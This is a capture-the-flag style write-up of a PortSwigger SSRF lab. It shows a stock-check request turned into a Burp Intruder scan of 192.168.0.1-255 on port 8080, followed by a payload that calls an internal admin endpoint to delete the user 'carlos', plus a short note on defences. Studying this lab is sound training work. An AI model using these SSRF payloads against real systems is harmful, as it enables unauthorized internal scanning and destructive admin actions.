[This lab](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system) demonstrates **Server-Side Request Forgery (SSRF)** used to **scan an internal network**.
The vulnerable stock checking feature can be weaponized to **brute-force IP addresses** in the `192.168.0.X` range to locate a hidden admin service running on **port 8080**.
#### 1. Locate the Stock Check Feature
- Opened a product page.
- Found the **"Check stock"** button.
- **Intercepted** the request using **Burp Suite**.
- Example request:
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
stockApi=http://stock.weliketoshop.net/product/stock/check?productId=1
```
- **Sent it to Intruder** for automation.
---
### 2. Configure Burp Intruder to Scan the IP Range
- Modified the `stockApi` to target the internal network:
```text
stockApi=http://192.168.0.1:8080/admin
```
- Highlighted the last octet (`1`) and **added a § payload marker**.
- **Payload type:** Numbers
- **Settings:**
|Setting|Value|
|---|---|
|From|1|
|To|255|
|Step|1|
- Started the attack.
![[CleanShot 2025-04-27 at 20.51.16.png]]
---
#### 3. Identify the Admin Panel
- Sorted by **HTTP status code** in Intruder results.
- Found a **single 200 OK** response at an IP like:
```text
192.168.0.X
```
- Confirmed — **admin interface available** at:
```text
http://192.168.0.X:8080/admin
```
![[CleanShot 2025-04-27 at 20.51.54.png]]
---
#### 4. Trigger the User Deletion
- **Sent** the successful request to **Repeater**.
- Modified the `stockApi` to:
```text
http://192.168.0.7:8080/admin/delete?username=carlos
```
- Issued the request.
- 🎉 **Lab solved!**
![[CleanShot 2025-04-27 at 20.52.56.png]]
---
#### Technical Breakdown
|Component|Description|
|---|---|
|**Vulnerability**|Server-Side Request Forgery (SSRF)|
|**Root Cause**|Application blindly fetches user-provided URLs from the server side|
|**Impact**|Internal network scanning, unauthorized internal access|
|**Defense**|Validate URLs against a strict allowlist, disallow internal IP ranges (like 127.0.0.1, 192.168.x.x, etc.)|